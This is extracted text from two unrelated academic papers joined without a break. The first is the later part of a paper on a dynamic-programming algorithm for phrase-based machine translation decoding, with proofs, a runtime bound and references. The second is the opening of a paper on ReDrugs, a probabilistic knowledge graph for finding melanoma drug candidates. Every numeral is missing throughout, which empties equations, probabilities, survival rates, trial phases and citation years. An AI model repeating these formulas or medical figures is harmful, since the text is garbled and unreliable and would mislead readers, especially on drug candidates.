phrase (s,t,e) has t ≤ j, and from the definition of sub-derivations it follows that the phrase is in one of the phrase sequences π . . .πr. proof of property : this follows from the distor- tion limit. consider the complement sub-derivation h̄j = 〈π̄ . . . π̄r〉. for the distortion limit to be sat- isfied, for all i ∈{ . . .r}, we must have |t(π̄i− ) + −s(πi)| ≤ d we must also have t(π̄i− ) > j, and s(πi) ≤ j, by the definition of sub-derivations. it follows that s(πi) ∈{(j −d + ) . . .j}. proof of property : this follows from the distortion limit. first consider the case where π̄r is non-empty. for the distortion limit to be satisfied, for all i ∈ { . . .r}, we must have |t(πi) + −s(π̄i)| ≤ d we must also have t(πi) ≤ j, and s(π̄i) > j, by the definition of sub-derivations. it follows that t(πi) ∈ {(j −d) . . .j}. next consider the case where π̄r is empty. in this case we must have j = n. for the distortion limit to be satisfied, for all i ∈{ . . . (r− )}, we must have |t(πi) + −s(π̄i)| ≤ d we must also have t(πi) ≤ j, and s(π̄i) > j, by the definition of sub-derivations. it follows that t(πi) ∈ {(j−d) . . .j} for i ∈{ . . . (r− )}. for i = r, we must have t(πi) = n, from which it again follows that t(πr) = n ∈{(j −d) . . .j}. we now define an equivalence relation between sub-derivations, which will be central to the dy- namic programming algorithm. we define a func- tion σ that maps a phrase sequence π to its signature. the signature is a four-tuple: σ(π) = (s,ws, t,wt). where s is the start position, ws is the start word, t is the end position and wt is the end word of the phrase sequence. we will use s(σ), ws(σ), t(σ), and wt(σ) to refer to each component of a signature σ. for example, given a phrase sequence π = 〈 ( , , <s>) ( , , we) ( , , also) 〉 , its signature is σ(π) = ( , <s>, , also). the signature of a sub-derivation hj = 〈π . . .πr〉 is defined to be σ(hj) = 〈σ(π ) . . .σ(πr)〉. for example, with h as defined above, we have σ(h ) = 〈( ,<s>, , also ) , ( , these, , seriously )〉 two partial derivations hj and h′j are in the same equivalence class iff σ(hj) = σ(h′j). we can now state the following lemma: lemma . define h∗ to be the optimal deriva- tion for some input sentence, and h∗j to be a sub- derivation of h∗. suppose h′j is another sub- derivation with j words, such that σ(h′j) = σ(h ∗ j ). then it must be the case that f(h∗j ) ≥ f(h′j), where f is the function defined in section . . proof. define the sub-derivation and complement sub-derivation of h∗ as h∗j = 〈π . . .πr〉 h̄∗j = 〈π̄ . . . π̄r〉 we then have f(h∗) = f(h∗j ) + f(h̄ ∗ j ) + γ ( ) where f(. . .) is as defined in eq. , and γ takes into account the bigram language modeling scores and the distortion scores for the transitions π → π̄ , π̄ → π , π → π̄ , etc. the proof is by contradiction. define h′j = π ′ . . .π ′ r and assume that f(h∗j ) < f(h ′ j). now consider h′ = π′ π̄ π ′ π̄ . . .π ′ rπ̄r this is a valid derivation because the transitions π′ → π̄ , π̄ → π′ , π′ → π̄ have the same dis- tortion distances as π → π̄ , π̄ → π , π → π̄ , hence they must satisfy the distortion limit. we have f(h′) = f(h′j) + f(h̄ ∗ j ) + γ ( ) where γ has the same value as in eq. . this fol- lows because the scores for the transitions π′ → π̄ , π̄ → π′ , π′ → π̄ are identical to the scores for the transitions π → π̄ , π̄ → π , π → π̄ , because σ(h∗j ) = σ(h ′ j). it follows from eq. and eq. that if f(h′j) > f(h∗j ), then f(h ′) > f(h∗). but this contradicts the assumption that h∗ is optimal. it follows that we must have f(h′j) ≤ f(h∗j ). this lemma leads to a dynamic programming al- gorithm. each dynamic programming state consists of an integer j ∈{ . . .n} and a set of r signatures: t = (j,{σ . . .σr}) figure shows the dynamic programming algo- rithm. it relies on the following functions: inputs: • an integer n specifying the length of the input sequence. • a function δ(t) returning the set of valid transitions from state t . • a function τ(t, ∆) returning the state reached from state t by transition ∆ ∈ δ(t). • a function valid(t) returning true if state t is valid, otherwise false. • a function score(∆) that returns the score for any transition ∆. initialization: t = ( ,{( ,<s>, ,<s>)}) α(t ) = t = {t }, ∀j ∈{ . . .n},tj = ∅ for j = , . . . ,n− for each state t ∈tj for each ∆ ∈ δ(t) t ′ = τ(t, ∆) if valid(t ′) = false: continue score = α(t) + score(∆) define t to be the integer such that t ′ = (t,{σ . . .σr}) if t ′ /∈tt tt = tt ∪{t ′} α(t ′) = score bp(t ′) = (∆) else if score > α(t ′) α(t ′) = score bp(t ′) = (∆) return: the score of the state (n,{( ,<s>,n,</s>)}) in tn, and backpointers bp defining the transitions leading to this state. figure : the phrase-based decoding algorithm. α(t) is the score for state t . the bp(t) variables are back- pointers used in recovering the highest scoring sequence of transitions. • for any state t , δ(t) is the set of outgoing tran- sitions from state t . • for any state t , for any transition ∆ ∈ δ(t), τ(t, ∆) is the state reached by transition ∆ from state t . • for any state t , valid(t) checks if a resulting state is valid. • for any transition ∆, score(∆) is the score for the transition. we next give full definitions of these functions. . . definitions of δ(t) and τ(t, ∆) recall that for any state t , δ(t) returns the set of possible transitions from state t . in addition τ(t, ∆) returns the state reached when taking tran- sition ∆ ∈ δ(t). given the state t = (j,{σ . . .σr}), each transi- tion is of the form ψ pψ where ψ , p and ψ are defined as follows: • p is a phrase such that s(p) = j + . • ψ ∈{σ . . .σr}∪{φ}. if ψ = φ, it must be the case that |t(ψ ) + −s(p)| ≤ d and t(ψ ) = n. • ψ ∈{σ . . .σr}∪{φ}. if ψ = φ, it must be the case that |t(p) + −s(ψ )| ≤ d and s(ψ ) = . • if ψ = φ and ψ = φ, then ψ = ψ . thus there are four possible types of transition from a state t = (j,{σ . . .σr}): case : ∆ = φpφ. in this case the phrase p is incorporated as a stand-alone phrase. the new state t ′ is equal to (j′,{σ′ . . .σ′r+ }) where j′ = t(p), where σ′i = σi for i = . . .r, and σ ′ r+ = (s(p),e (p), t(p),em(p)). case : ∆ = σi pφ for some σi ∈ {σ . . .σr}. in this case the phrase p is appended to the signa- ture σi. the new state t ′ = τ(t, ∆) is of the form (j′,σ′ . . .σ ′ r), where j ′ = t(p), where σi is replaced by (s(σi),ws(σi), t(p),em(p)), and where σ′i′ = σi′ for all i′ = i. case : ∆ = φpσi for some σi ∈ {σ . . .σr}. in this case the phrase p is prepended to the signa- ture σi. the new state t ′ = τ(t, ∆) is of the form (j′,σ′ . . .σ ′ r), where j ′ = t(p), where σi is replaced by (s(p),e (p), t(σi),wt(σi)), and where σ′i′ = σi′ for all i′ = i. case : ∆ = σi pσi′ for some σi,σi′ ∈ {σ . . .σr}, with i′ = i. in this case phrase p is appended to signature σi, and prepended to signature σi′, effectively joining the two signa- tures together. in this case the new state t ′ = τ(t, ∆) is of the form (j′,σ′ . . .σ ′ r− ), where sig- natures σi and σi′ are replaced by a new signature (s(σi),ws(σi), t(σi′),wt(σi′)), and all other signa- tures are copied across from t to t ′. figure gives the dynamic programming states and transitions for the derivation h in figure . for example, the sub-derivation h = 〈〈 ( , ,<s>)( , , we must)( , , also) 〉 , 〈 ( , , these criticisms)( , , seriously) 〉〉 will be mapped to a state t = ( ,σ(h ) ) = ( , { ( ,<s>, , also), ( , these, , seriously) }) ( , { σ = ( ,<s>, ,<s> )}) ( , { σ = ( ,<s>, , must )}) ( , { σ = ( ,<s>, , also )}) ( , { σ = ( ,<s>, , also ) , σ = ( , these, , criticisms )}) ( , { σ = ( ,<s>, , also ) , σ = ( , these, , seriously )}) ( , { σ = ( ,<s>, , seriously )}) ( , { σ = ( ,<s>, ,</s> )}) σ ( , , we must) φ σ ( , , also) φ φ ( , , these criticisms) φ σ ( , , seriously) φ σ ( , , take) σ σ ( , , </s>) φ figure : dynamic programming states and the transi- tions from one state to another, using the same example as in figure . note that σi = σ(πi) for all πi ∈ hj. the transition σ ( , , take) σ from this state leads to a new state, t ′ = ( , { σ = ( ,<s>, , seriously) }) . definition of score(∆) figure gives the definition of score(∆), which incorporates the language model, phrase scores, and distortion penalty implied by the transition ∆. . definition of valid(t) figure gives the definition of valid(t). this function checks that the start and end points of each signature are in the set of allowed start and end points given in lemma . . a bound on the runtime of the algorithm we now give a bound on the algorithm’s run time. this will be the product of terms n and m, where n is an upper bound on the number of states in the dynamic program, and m is an upper bound on the number of outgoing transitions from any state. for any j ∈{ . . .n}, define first(j) to be the set of target-language words that can begin at posi- tion j and last(j) to be the set of target-language ∆ resulting phrase sequence score(∆) φpφ (s,e , t,em) ŵ(p) σi pφ (s(σi),ws(σi), t,em) ŵ(p) + λ(e |wt(σi)) + η ×|t(σi) + −s| φpσi (s,e , t(σi),wt(σi)) ŵ(p) + λ(ws(σi)|em) + η ×|t + −s(σi)| σi pσi′ (s(σi),ws(σi), t(σi′ ),wt(σi′ )) ŵ(p) + λ(e |wt(σi)) + η ×|t(σi) + −s| +λ(ws(σi′ )|em) + η ×|t + −s(σi′ )| figure : four operations that can extend a state t = (j,{σ . . .σr}) by a phrase p = (s,t,e . . .em), and the scores incurred. we define ŵ(p) = κ(p) +∑m i= λ(ei(p)|ei− (p)). the function ŵ(p) includes the phrase translation model κ and the language model scores that can be computed using p alone. the weight η is the distortion penalty. function valid(t) input: state t = ( j,{σ . . .σr} ) for i = . . .r if s(σi) < j −d + and s(σi) = return false if t(σi) < j −d return false return true figure : the valid function. words that can end at position j. first(j) = {w : ∃p = (s,t,e) s.t. s = j,e = w} last(j) = {w : ∃p = (s,t,e) s.t. t = j,em = w} in addition, define singles(j) to be the set of phrases that translate the single word at position j: singles(j) = {p : s(p) = j and t(p) = j} next, define h to be the smallest integer such that for all j, |first(j)| ≤ h, |last(j)| ≤ h, and |singles(j)| ≤ h. thus h is a measure of the maximal ambiguity of any word xj in the input. finally, for any position j, define start(j) to be the set of phrases starting at position j: start(j) = {p : s(p) = j} and define l to be the smallest integer such that for all j, |start(j)| ≤ l. given these definitions we can state the following result: theorem . the time complexity of the algorithm is o(nd!lhd+ ). to prove this we need the following definition: definition (p-structures). for any finite set a of integers with |a| = k, a p-structure is a set of r or- dered pairs {(si, ti)}ri= that satisfies the following properties: ) ≤ r ≤ k; ) for each i ∈ { . . .r}, si ∈ a and ti ∈ a (both si = ti and si = ti are allowed); ) for each j ∈ a, there is at most one index i ∈{ . . .r} such that (si = j) or (ti = j) or (si = j and ti = j). we use g(k) to denote the number of unique p- structures for a set a with |a| = k. we then have the following lemmas: lemma . the function g(k) satisfies g( ) = , g( ) = , and the following recurrence for k ≥ : g(k) = g(k − ) + (n− )g(k − ) proof. the proof is in appendix a. lemma . consider the function h(k) = k ×g(k). h(k) is in o((k − )!). proof. the proof is in appendix b. we can now prove the theorem: proof of theorem : first consider the num- ber of states in the dynamic program. each state is of the form (j,{σ . . .σr}) where the set {(s(σi), t(σi))}ri= is a p-structure over the set { }∪ {(j − d) . . .d}. the number of possible values for {(s(σi),e(σi))}ri= is at most g(d + ). for a fixed choice of {(s(σi), t(σi))}ri= we will ar- gue that there are at most hd+ possible values for {(ws(σi),wt(σi))}ri= . this follows because for each k ∈ {(j − d) . . .j} there are at most h pos- sible choices: if there is some i such that s(σi) = k, and t(σi) = k, then the associated word ws(σi) is in the set first(k); alternatively if there is some i such that t(σi) = k, and s(σi) = k, then the as- sociated word wt(σi) is in the set last(k); alterna- tively if there is some i such that s(σi) = t(σi) = k then the associated words ws(σi),wt(σi) must be the first/last word of some phrase in singles(k); alternatively there is no i such that s(σi) = k or t(σi) = k, in which case there is no choice asso- ciated with position k in the sentence. hence there are at most h choices associated with each position k ∈ {(j − d) . . .j}, giving hd+ choices in total. combining these results, and noting that there are n choices of the variable j, implies that there are at most ng(d + )hd+ states in the dynamic program. now consider the number of transitions from any state. a transition is of the form ψ pψ as defined in section . . . for a given state there are at most (d + ) choices for ψ and ψ , and l choices for p, giving at most (d + ) l choices in total. multiplying the upper bounds on the number of states and number of transitions for each state gives an upper bound on the runtime of the algorithm as o(ng(d + )hd+ (d + ) l). hence by lemma the runtime is o(nd!lhd+ ) time. the bound g(d + ) over the number of possible values for {(s(σi),e(σi))}ri= is somewhat loose, as the set of p-structures over { }∪{(j −d) . . .d} in- cludes impossible values {(si, ti)}ri= where for ex- ample there is no i such that s(σi) = . however the bound is tight enough to give the o(d!) runtime. discussion we conclude the paper with discussion of some is- sues. first we describe how the dynamic program- ming structures we have described can be used in conjunction with beam search. second, we give more analysis of the complexity of the widely-used decoding algorithm of koehn et al. ( ). . beam search beam search is widely used in phrase-based decod- ing; it can also be applied to our dynamic program- ming construction. we can replace the line for each state t ∈tj in the algorithm in figure with for each state t ∈ beam(tj) where beam is a function that returns a subset of tj, most often the highest scoring elements of tj un- der some scoring criterion. a key question concerns the choice of scoring function γ(t) used to rank states. one proposal is to define γ(t) = α(t) + β(t) where α(t) is the score used in the dynamic program, and β(t) = ∑ i:ws(σi) =<s> λu(ws(σi)). here λu(w) is the score of word w under a unigram language model. the β(t) scores allow different states in tj, which have different words ws(σi) at the start of signatures, to be comparable: for exam- ple it compensates for the case where ws(σi) is a rare word, which will incur a low probability when the bigram 〈w ws(σi)〉 for some word w is constructed during search. the β(t) values play a similar role to “future scores” in the algorithm of koehn et al. ( ). however in the koehn et al. ( ) algorithm, dif- ferent items in the same beam can translate differ- ent subsets of the input sentence, making future- score estimation more involved. in our case all items in tj translate all words x . . .xj inclusive, which may make comparison of different hypotheses more straightforward. . complexity of decoding with bit-string representations a common method for decoding phrase-based mod- els, as described in koehn et al. ( ), is to use beam search in conjunction with a search algorithm that ) creates the target language string in strictly left-to-right order; ) uses a bit string with bits bi ∈{ , } for i = . . .n representing at each point whether word i in the input has been translated. a natural question is whether the number of possible bit strings for a model with a fixed distortion limit d can grow exponentially quickly with respect to the length of the input sentence. this section gives an example that shows that this is indeed the case. assume that our sentence length n is such that (n− )/ is an integer. assume as before x = <s> and xn = </s>. for each k ∈ { . . . ((n− )/ − )}, assume we have the following phrases for the words x k+ . . .x k+ : ( k + , k + ,uk) ( k + , k + ,vk) ( k + , k + ,wk) ( k + , k + ,zk) ( k + , k + ,yk) note that the only source of ambiguity is for each k whether we use yk to translate the entire phrase x k+ x k+ , or whether we use wk and zk to trans- late x k+ and x k+ separately. with a distortion limit d ≥ , the number of pos- sible bit strings in this example is at least (n− )/ . this follows because for any setting of the variables b k+ ∈ { , } for k ∈ { . . . ((n − )/ − )}, there is a valid derivation p . . .pl such that the pre- fix p . . .pl where l = + (n − )/ gives this bit string. simply choose p = ( , ,<s>) and for l′ ∈ { . . . (n− )/ − } choose pl′+ = ( l′ + , l′ + ,yi) if b k+ = , pl′+ = ( l′ + , l′ + ,zi) otherwise. it can be verified that p . . .pl is a valid prefix (there is a valid way to give a complete deriva- tion from this prefix). as one example, for n = , and b = and b = , a valid derivation is ( , ,<s>)( , ,y )( , ,z )( , ,v )( , ,v ) ( , ,u )( , ,u )( , ,w )( , ,</s>) in this case the prefix ( , ,<s>)( , ,y )( , ,z ) gives b = and b = . other values for b and b can be given by using ( , ,z ) in place of ( , ,y ), and ( , ,y ) in place of ( , ,z ), with the follow- ing phrases modified appropriately. conclusion we have given a polynomial-time dynamic program- ming algorithm for phrase-based decoding with a fixed distortion limit. the algorithm uses a quite dif- ferent representation of states from previous decod- ing algorithms, is easily amenable to beam search, and leads to a new perspective on phrase-based de- coding. future work should investigate the effec- tiveness of the algorithm in practice. a proof of lemma without loss of generality assume a = { , , , . . .k}. we have g( ) = , because in this case the valid p-structures are {( , )} and ∅. to calculate g(k) we can sum over four possibilities: case : there are g(k− ) p-structures with si = ti = for some i ∈ { . . .r}. this follows because once si = ti = for some i, there are g(k − ) possible p-structures for the integers { , , . . .k}. case : there are g(k − ) p-structures such that si = and ti = for all i ∈ { . . .r}. this fol- lows because once si = and ti = for all i, there are g(k − ) possible p-structures for the integers { , , . . .k}. case : there are (k− ) ×g(k− ) p-structures such that there is some i ∈ { . . .r} with si = and ti = . this follows because for the i such that si = , there are (k− ) choices for the value for ti, and there are then g(k− ) possible p-structures for the remaining integers in the set { . . .k}/{ , ti}. case : there are (k− ) ×g(k− ) p-structures such that there is some i ∈ { . . .r} with ti = and si = . this follows because for the i such that ti = , there are (k− ) choices for the value for si, and there are then g(k− ) possible p-structures for the remaining integers in the set { . . .k}/{ ,si}. summing over these possibilities gives the fol- lowing recurrence: g(k) = g(k − ) + (k − ) ×g(k − ) b proof of lemma recall that h(k) = f(k) ×g(k) where f(k) = k . define k to be the smallest integer such that for all k ≥ k , f(k) f(k − ) + f(k) f(k − ) · k − k − ≤ k − ( ) for f(k) = k we have k = . now choose a constant c such that for all k ∈ { . . . (k − )}, h(k) ≤ c × (k − )!. we will prove by induction that under these definitions of k and c we have h(k) ≤ c(k − )! for all integers k, hence h(k) is in o((k − )!). for values k ≥ k , we have h(k) = f(k)g(k) = f(k)g(k − ) + f(k)(k − )g(k − ) ( ) = f(k) f(k − )h(k − ) + f(k) f(k − ) (k − )h(k − ) ≤ ( cf(k) f(k − ) + cf(k) f(k − ) · k − k − ) (k − )! ( ) ≤ c(k − )! ( ) eq. follows from g(k) = g(k− )+ (k− )g(k− ). eq. follows by the inductive hypothesis that h(k − ) ≤ c(k − )! and h(k − ) ≤ c(k − )!. eq follows because eq. holds for all k ≥ k . references wilker aziz, marc dymetman, and lucia specia. . exact decoding for phrase-based statistical machine translation. in proceedings of the conference on em- pirical methods in natural language processing. as- sociation for computational linguistics. yin-wen chang and michael collins. . exact de- coding of phrase-based translation models through la- grangian relaxation. in proceedings of the conference on empirical methods in natural language process- ing, pages – . association for computational lin- guistics. colin cherry, robert c moore, and chris quirk. . on hierarchical re-ordering and permutation parsing for phrase-based decoding. in proceedings of the seventh workshop on statistical machine translation, pages – . association for computational lin- guistics. john denero and dan klein. . the complexity of phrase alignment problems. in proceedings of the th annual meeting of the association for computational linguistics on human language technologies: short papers, pages – . association for computational linguistics. yang feng, haitao mi, yang liu, and qun liu. . an efficient shift-reduce decoding algorithm for phrased- based machine translation. in proceedings of the rd international conference on computational linguis- tics: posters, pages – . association for compu- tational linguistics. michel galley and christopher d manning. . a simple and effective hierarchical phrase reordering model. in proceedings of the conference on empir- ical methods in natural language processing, pages – . association for computational linguistics. michel galley and christopher d manning. . accu- rate non-hierarchical phrase-based translation. in hu- man language technologies: the annual con- ference of the north american chapter of the associ- ation for computational linguistics, pages – . association for computational linguistics. kevin knight. . decoding complexity in word- replacement translation models. computational lin- guistics, ( ). philipp koehn, franz josef och, and daniel marcu. . statistical phrase-based translation. in proceed- ings of the conference of the north american chapter of the association for computational linguis- tics on human language technology-volume , pages – . association for computational linguistics. philipp koehn, amittai axelrod, chris callison-burch, miles osborne, and david talbot. a. edinburgh system description for the iwslt speech trans- lation evaluation. in proceedings of the second work- shop on statistical machine translation, statmt ’ , pages – , stroudsburg, pa, usa. association for computational linguistics. philipp koehn, hieu hoang, alexandra birch, chris callison-burch, marcello federico, nicola bertoldi, brooke cowan, wade shen, christine moran, richard zens, chris dyer, ondřej bojar, alexandra con- stantin, and evan herbst. b. moses: open source toolkit for statistical machine translation. in proceed- ings of the th annual meeting of the acl on inter- active poster and demonstration sessions, pages – . association for computational linguistics. shankar kumar and william byrne. . local phrase reordering models for statistical machine translation. in proceedings of the conference on human language technology and empirical methods in natural lan- guage processing, pages – . association for computational linguistics. eugene leighton lawler, jan karel lenstra, alexander hendrik george rinnooy kan, and david bernard shmoys. . the traveling salesman problem. john wiley & sons ltd. adam lopez. . translation as weighted deduction. in proceedings of the th conference of the european chapter of the association for computational linguis- tics, pages – . association for computational linguistics. burkhard monien and ivan hal sudborough. . bandwidth constrained np-complete problems. in proceedings of the thirteenth annual acm symposium on theory of computing, pages – . acm. franz josef och and hermann ney. . the align- ment template approach to statistical machine transla- tion. computational linguistics, ( ): – . h donald ratliff and arnon s rosenthal. . order- picking in a rectangular warehouse: a solvable case of the traveling salesman problem. operations research, ( ): – . christoph tillmann. . a unigram orientation model for statistical machine translation. in proceedings of hlt-naacl : short papers, pages – . as- sociation for computational linguistics. dekai wu. . stochastic inversion transduction grammars and bilingual parsing of parallel corpora. computational linguistics, ( ): – . mikhail zaslavskiy, marc dymetman, and nicola can- cedda. . phrase-based statistical machine transla- tion as a traveling salesman problem. in proceedings of the joint conference of the th annual meeting of the acl and the th international joint conference on natural language processing of the afnlp: volume -volume , pages – . association for compu- tational linguistics. richard zens and hermann ney. . a comparative study on reordering constraints in statistical machine translation. in proceedings of the st annual meeting on association for computational linguistics-volume , pages – . association for computational lin- guistics. richard zens, hermann ney, taro watanabe, and ei- ichiro sumita. . reordering constraints for phrase-based statistical machine translation. in pro- ceedings of the th international conference on computational linguistics, page . association for computational linguistics. finding melanoma drugs through a probabilistic knowledge graph finding melanoma drugs through a probabilistic knowledge graph james p. mccusker , michel dumontier , rui yan , sylvia he , jonathan s. dordick , and deborah l. mcguinness , department of computer science, rensselaer polytechnic institute, troy, ny, usa stanford center for biomedical informatics research, stanford university school of medicine, stanford, ca, usa department of chemical & biological engineering, rensselaer polytechnic institute, troy, ny, usa center for biotechnology & interdisciplinary studies, rensselaer polytechnic institute, troy, ny, usa abstract metastatic cutaneous melanoma is an aggressive skin cancer with some progression- slowing treatments but no known cure. the omics data explosion has created many possible drug candidates; however, filtering criteria remain challenging, and systems biology approaches have become fragmented with many disconnected databases. using drug, protein and disease interactions, we built an evidence-weighted knowledge graph of integrated interactions. our knowledge graph-based system, redrugs, can be used via an application programming interface or web interface, and has generated high-quality melanoma drug candidates. we show that probabilistic analysis of systems biology graphs increases drug candidate quality compared to non-probabilistic methods. four of the candidates are novel therapies, three of which have been tested with other cancers. all other candidates have current or completed clinical trials, or have been studied in in vivo or in vitro. this approach can be used to identify candidate therapies for use in research or personalized medicine. subjects bioinformatics, computational biology, data science, world wide web and web science keywords melanoma, knowledge graphs, drug repositioning, uncertainty reasoning introduction metastatic cutaneous melanoma is an aggressive cancer of the skin with low prevalence but very high mortality rate, with an estimated -year survival rate of % (barth, wanek & morton, ). there are currently no known therapies that can consistently cure metastatic melanoma. vemurafenib is effective against braf mutant melanomas (chapman et al., ) but resistant cells often result in recurrence of metastases (le et al., ). melanoma itself may be best approached based on the individual genetics of the tumor, as it has been shown to involve mutations in many different genes to produce the same disease (krauthammer et al., ). because of this, an individualized approach may be necessary to find effective treatments. drug repurposing, or the discovery of new uses for existing approved drugs, can often lead to effective new treatments for diseases. a wide range of computational methods have been developed in support of drug repositioning. computational approaches (sanseau & koehler, ) include topic modeling (bisgin et al., , ), side-effect how to cite this article mccusker et al. ( ), finding melanoma drugs through a probabilistic knowledge graph. peerj comput. sci. :e ; doi . /peerj-cs. submitted april accepted december published february corresponding authors james p. mccusker, mccusj@cs.rpi.edu deborah l. mcguinness, dlm@cs.rpi.edu academic editor yonghong peng additional information and declarations can be found on page doi . /peerj-cs. copyright mccusker et al. distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:mccusj@�cs.�rpi.�edu mailto:dlm@�cs.�rpi.�edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ similarity (yang & agarwal, ; ye, liu & wei, ), drug and/or disease similarity (chiang & butte, ; gottlieb et al., ), genome-wide association studies (kingsmore et al., ; grover et al., ), and gene expression (lamb et al., ; sirota et al., ). systems biology has also provided a number of network analysis approaches (yang & agarwal, ; wu, wang & chen, ; cheng et al., ; emig et al., ; harrold, ramanathan & mager, ; wu et al., ; vogt, prinz & campillos, ) but the field has been limited by a fragmentation of databases. most systems biology databases are not aligned with each other, and typically leave out crucial information about how other biological entities, like drugs and diseases, interact with the systems biology graph. further, while some interaction databases provide human curation and validation of pathway interactions, and others provide experimental evidence for the recorded interactions, there has not yet been, to our knowledge, a resource that combines the two approaches and quantifies the reliability of the evidence used to assert the interactions. a knowledge graph is a compilation of facts and figures that can be used to provide contextual meaning to searches. google is using knowledge graphs to improve its search and to analyze the information graph of the web; facebook is using them to analyze the social graph. we built our knowledge graph with the goal of unifying large parts of biomedical domain knowledge for both mining and interactive exploration related to drugs, diseases, and proteins. our knowledge graph is enhanced by the provenance of each fragment of knowledge captured, which is used to compute the confidence probabilities for each of those fragments. further, we use open standards from the world wide web consortium (w c), including the resource description framework (rdf) (richard, david & markus, ), web ontology language (owl) (motik, patel-schneider & cuenca grau, ), and sparql (harris, seaborne & prud’hommeaux, ). the representation of the knowledge in our knowledge graph is aligned with best practice vocabularies and ontologies from the w c and the biomedical community, including the provenance ontology (prov-o) (lebo, sahoo & mcguinness, ), the hupo proteomics standards initiative molecular interactions (psi-mi) ontology (hermjakob et al., ), and the semanticscience integrated ontology (sio) (dumontier et al., ). use of these standards, vocabularies, and ontologies make it simple for redrugs to integrate with other similar efforts in the future with minimal effort. we proposed and built a novel computational drug repositioning platform, that we refer to as redrugs, that applies probabilistic filtering over individually-supported assertions drawn from multiple databases pertaining to systems biology, pharmacology, disease association, and gene expression data. we use our platform to identify novel and known drugs for melanoma. results we used redrugs to examine the drug–target–disease network and identify known, novel, and well supported melanoma drugs. the redrugs knowledge base contained , drugs, , diseases, , proteins, and , interactions. the drugs included in redrugs follow the distribution by the anatomic therapeutic classification (atc) categories shown in fig. . mccusker et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ we examined drug and gene connections that were three or less interaction steps from melanoma, and additionally filtered interactions with a joint probability greater or equal to . . we identified drugs in the resulting drug–gene–disease network surrounding melanoma as illustrated in fig. . we then validated the set of drugs by determining their position in the drug discovery pipeline for melanoma. table shows that nearly all drugs uncovered by redrugs were previously been identified as potential melanoma therapies either in clinical trials or in vivo or in vitro. of the drugs, have been in phase i, ii, or iii clinical trials, five have been studied in vitro, four in vivo, one was investigated as a case study, and three are novel. to further evaluate our system, we examined the impact of decreasing the joint probability or increasing the number of interaction steps. figures a and b show precision, recall, and f-measure curves while varying each parameter. using these information retrieval performance curves, we found that using a joint probability of . or greater with three or less interaction steps maximizes the precision and recall as shown in fig. . by performing a sampled literature search on hypothesis candidates with a joint probability of . or higher and six or fewer interaction steps, we were able to generate precision, recall, and f-measure curves for both cutoffs to find our cutoff of . with three or fewer interaction steps. the precision, recall, and f-measure curves are shown for varying joint probability thresholds in fig. a and for varying interaction step counts in fig. b. figure percentage approved drugs in each of the categories of the anatomic therapeutic classification (atc) system. mccusker et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ discussion we designed redrugs to quickly and automatically integrate and filter a heterogeneous biomedical knowledge graph to generate high-confidence drug repositioning candidates. our results indicate that redrugs generates clinically plausible drug candidates, in which half are in various stages of clinical trials, while others are novel or are being investigated in pre-clinical studies. by helping to consolidate the three main datatypes—drug targets, protein interactions, and disease genes—redrugs can amplify the ability of researchers to filter the vast amount of information into those that are relevant for drug discovery. candidate significance three drugs were identified that have not previously been studied for melanoma treatment. framycetin, a cxcr inhibitor, has not previously been considered for melanoma treatment. while it is nephrotoxic when administered orally (greenberg, ), it is used topically as an antibacterial treatment. while it may not be of use for metastasis, it might serve as a simple, inexpensive prophylactic treatment after excision of primary tumors. additionally, lucanthone and podofilox were identified as having potential effects on melanoma through cdkn a and map kinase, respectively. figure the interaction graph of predicted melanoma drugs with a probability of . or higher and have three or fewer intervening interactions between drug and disease. the “explore” tab contains the controls to expand the network in various ways, including the filtering parameters. node and edge detail tabs provide additional information about the selected node or edge, including the probabilities of the edges selected. users can control the layout algorithm and related options using the “options” tab. mccusker et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ one drug we identified, vemurafenib, is approved for treatment of late stage melanoma has been shown to inhibit the braf protein in braf-v mutant melanomas (chapman et al., ). however, cells can become resistant to vemurafenib, thereby leading to metastasis (le et al., ). a number of the drugs we identified are in clinical trials for treatment of melanoma. we identified braf-oriented drugs, dabrafenib (hauschild et al., ), sorafenib (national cancer institute, ), and regorafenib (istituto clinico humanitas, ), that have been evaluated in clinical trials, but have not yet been approved. zidovudine or azidothymidine is a tert inhibitor that has shown significant melanoma tumor reductions in mouse models (humer et al., ). three map kinase-related compounds, vinblastine (luikart, kennealey & kirkwood, ), trametinib (kim et al., ), and vinorelbine (whitehead et al., ) were identified that are in clinical trials for melanoma treatment. cdkn a was another popular target, as irinotecan (fiorentini et al., ), table drug discovery status for drug candidates identified using redrugs. status drug pathway steps joint p approved vemurafenib (chapman et al., ) braf . phase iii dabrafenib (hauschild et al., ) braf . sorafenib (national cancer institute, ) braf . vinblastine (luikart, kennealey & kirkwood, ) map kinase . phase ii zidovudine (humer et al., ) tert . trametinib (kim et al., ) map kinase . regorafenib (istituto clinico humanitas, ) braf . nadroparin (nagy, turcsik & blaskó, ) myc . vinorelbine (whitehead et al., ) map kinase . irinotecan (fiorentini et al., ) cdkn a . topotecan (kraut et al., ) cdkn a . phase i sodium stibogluconate (naing, ) cdkn a . case study ingenol mebutate (mansuy et al., ) prkca/braf . in vitro bosutinib (homsi et al., ) map kinase . purvalanol (smalley et al., ) map kinase/tp . ellagic acid (kim et al., ) prkca/braf . albendazole (patel et al., ) cdkn a . colchicine (lemontt, azzaria & gros, ) map kinase . in vivo plerixafor (d’alterio et al., ) cxcr . vincristine (sawada et al., ) map kinase . l-methionine (clavo & wahl, ) cdkn a . mebendazole (doudican et al., ) cdkn a . novel framycetin cxcr . lucanthone cdkn a . podofilox map kinase . note: “pathway” refers to the target or pathway that the drug acts on. “steps” is distance in number of interactions between the drug and the disease, and “joint p” is the joint probability that all of those interactions occur. mccusker et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ topotecan (kraut et al., ), and sodium stibogluconate (naing, ) are all drugs in clinical trial that we identified as potential therapies. many other drugs were identified that are being studied in the lab. additional drugs were identified that target the map kinase pathway, including bosutinib (homsi et al., ), purvalanol (smalley et al., ), colchicine (lemontt, azzaria & gros, ), and vincristine (sawada et al., ). 